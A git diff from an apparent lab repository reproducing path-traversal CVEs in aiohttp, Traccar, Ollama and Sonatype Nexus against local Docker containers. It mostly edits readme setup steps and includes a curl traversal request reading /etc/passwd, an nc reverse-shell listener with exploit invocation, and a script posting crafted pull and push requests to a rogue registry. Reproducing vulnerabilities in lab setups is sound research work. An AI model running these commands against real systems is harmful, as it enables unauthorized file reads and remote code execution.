diff --git a/.gitignore b/.gitignore index d911926..4b2ab36 100644 --- a/.gitignore +++ b/.gitignore @@ -2,4 +2,9 @@ go1.21.1.linux-amd64.tar.gz go.sum go.mod +success.txt +path_traversal/CVE-2024-48914/package-lock.json +path_traversal/CVE-2023-1177/.env +path_traversal/CVE-2024-48914/package.json +.gitignore diff --git a/path_traversal/CVE-2024-23334/readme.md b/path_traversal/CVE-2024-23334/readme.md index 74bafa1..54f1c91 100644 --- a/path_traversal/CVE-2024-23334/readme.md +++ b/path_traversal/CVE-2024-23334/readme.md @@ -14,6 +14,6 @@ - Execute : ``` python CVE-2024-23334.py ``` ### Step 2: -- Target Server: ``` http://localhost/8081``` +- Target Server: ``` http://localhost:8081``` - Once aiohttp server is up and running, check on port 8081 of localhost - ``` curl -s --path-as-is "http://localhost:8081/static/../../../../../etc/passwd ``` \ No newline at end of file diff --git a/path_traversal/CVE-2024-24809/exec.sh b/path_traversal/CVE-2024-24809/exec.sh old mode 100644 new mode 100755 diff --git a/path_traversal/CVE-2024-24809/readme.md b/path_traversal/CVE-2024-24809/readme.md index 8081a51..ecdb78e 100644 --- a/path_traversal/CVE-2024-24809/readme.md +++ b/path_traversal/CVE-2024-24809/readme.md @@ -23,10 +23,34 @@ nc -lvnp 4444 ``` ### Step 3: -- Target server: ``` http://localhost/8089``` + +- ```sudo docker ps -a``` and find your container id. ```sudo dokcer inspect ``` +- Getting the bash shel inside the container traccar application: ```sudo docker exec -it de754882c324 sh``` +- Execute the following commands: + ``` + apk add dcron +apk add openrc +apk add nano +apk add inotify-tools +Update /etc/crontabs/root to have the 1minute job: nano /etc/crontabs/root +- inside the file add the following at the end:= * * * * * run-parts /etc/periodic/1minute +mkdir /etc/periodic/1minute +rc-service /usr/sbin/crond start +crontab -l + +Copy contents from the exec.sh file + + +chmod +x exec.sh + +Run this file in the below terminal: +/opt/traccar # ./exec.sh & + ``` +- Check your host port and add it in the ```target_url=``` inside the exec.sh, bash file +- Target server: ``` http://localhost:8089``` Execute exploit script ``` -go run exploit.go http://localhost:80 LISTENER_IP LISTENER_PORT -``` \ No newline at end of file +go run exploit.go http://localhost:80 < LISTENER_IP > < LISTENER_PORT > +``` diff --git a/path_traversal/CVE-2024-37032/exec.sh b/path_traversal/CVE-2024-37032/exec.sh index ef1d43b..b86e7cd 100755 --- a/path_traversal/CVE-2024-37032/exec.sh +++ b/path_traversal/CVE-2024-37032/exec.sh @@ -1,6 +1,6 @@ #!/bin/bash -HOST="10.155.102.94" +HOST="192.168.1.40" target_url="http://${HOST}:11434" vuln_registry_url="${HOST}/rogue/poc" @@ -9,4 +9,4 @@ pull_url="${target_url}/api/pull" push_url="${target_url}/api/push" curl -X POST -H "Content-Type: application/json" -d '{"name": "'"${vuln_registry_url}"'", "insecure": true}' "${pull_url}" -curl -X POST -H "Content-Type: application/json" -d '{"name": "'"${vuln_registry_url}"'", "insecure": true}' "${push_url}" \ No newline at end of file +curl -X POST -H "Content-Type: application/json" -d '{"name": "'"${vuln_registry_url}"'", "insecure": true}' "${push_url}" diff --git a/path_traversal/CVE-2024-37032/readme.md b/path_traversal/CVE-2024-37032/readme.md index e7f41b4..2e40cdd 100644 --- a/path_traversal/CVE-2024-37032/readme.md +++ b/path_traversal/CVE-2024-37032/readme.md @@ -21,10 +21,12 @@ Execute the following to install go Execute: ``` docker run -d -v ollama:/root/.ollama -p 11434:11434 --name ollama ollama/ollama:0.1.33 ``` and set up the docker container -## Step 2: -- Target server: ```http://localhost/80``` +## Step 2: +- ```hostname -I``` to find your IP. Add this inside target_server.py : ```HOST = ``` + +- Target server: ```http://localhost/``` - Rogue Server Setup: -Execute Target Server: ``` go run rogue_server.go ``` +Execute Target Server: ``` python target_server.py ``` ## Step 3: -Exploit Script Execution: ``` go run CVE-2024-23334.go ``` \ No newline at end of file +Exploit Script Execution: ``` ./exec.sh ``` \ No newline at end of file diff --git a/path_traversal/CVE-2024-37032/target_server.py b/path_traversal/CVE-2024-37032/target_server.py index 0cf4979..95836dd 100644 --- a/path_traversal/CVE-2024-37032/target_server.py +++ b/path_traversal/CVE-2024-37032/target_server.py @@ -1,6 +1,6 @@ from fastapi import FastAPI, Request, Response -HOST = "10.155.102.94" +HOST = "192.168.1.40" app = FastAPI() @app.get("/") diff --git a/path_traversal/CVE-2024-48914/readme.md b/path_traversal/CVE-2024-48914/readme.md index e4214a1..8997c21 100644 --- a/path_traversal/CVE-2024-48914/readme.md +++ b/path_traversal/CVE-2024-48914/readme.md @@ -64,7 +64,7 @@ volumes: driver: local ``` - Build the docker and run it: - ```docker compose up --build``` + ```sudo docker-compose up``` ### Step 3: - Open a new terminal and run the following commands diff --git a/path_traversal/CVE-2024-4956/readme.md b/path_traversal/CVE-2024-4956/readme.md index a62583e..512193f 100644 --- a/path_traversal/CVE-2024-4956/readme.md +++ b/path_traversal/CVE-2024-4956/readme.md @@ -1,3 +1,5 @@ +# CVE-2024-4956: Path Traversal Vulnerability in Sonatype Nexus Repository 3 + ## Article Source : ``` https://ethicalhacking.uk/cve-2024-4956-path-traversal-vulnerability-in-sonatype-nexus-repository-3/#gsc.tab=0 @@ -15,5 +17,5 @@ docker run -p 8081:8081 --name nexus sonatype/nexus3:3.68.0-java8 ### Step 3: Create ```exploit.sh bash``` file ### Step 4: Execute: -- Target Server: ``` http://localhost/8081 ``` +- Target Server: ``` http://localhost:8081 ``` ``` ./exploit.sh ``` \ No newline at end of file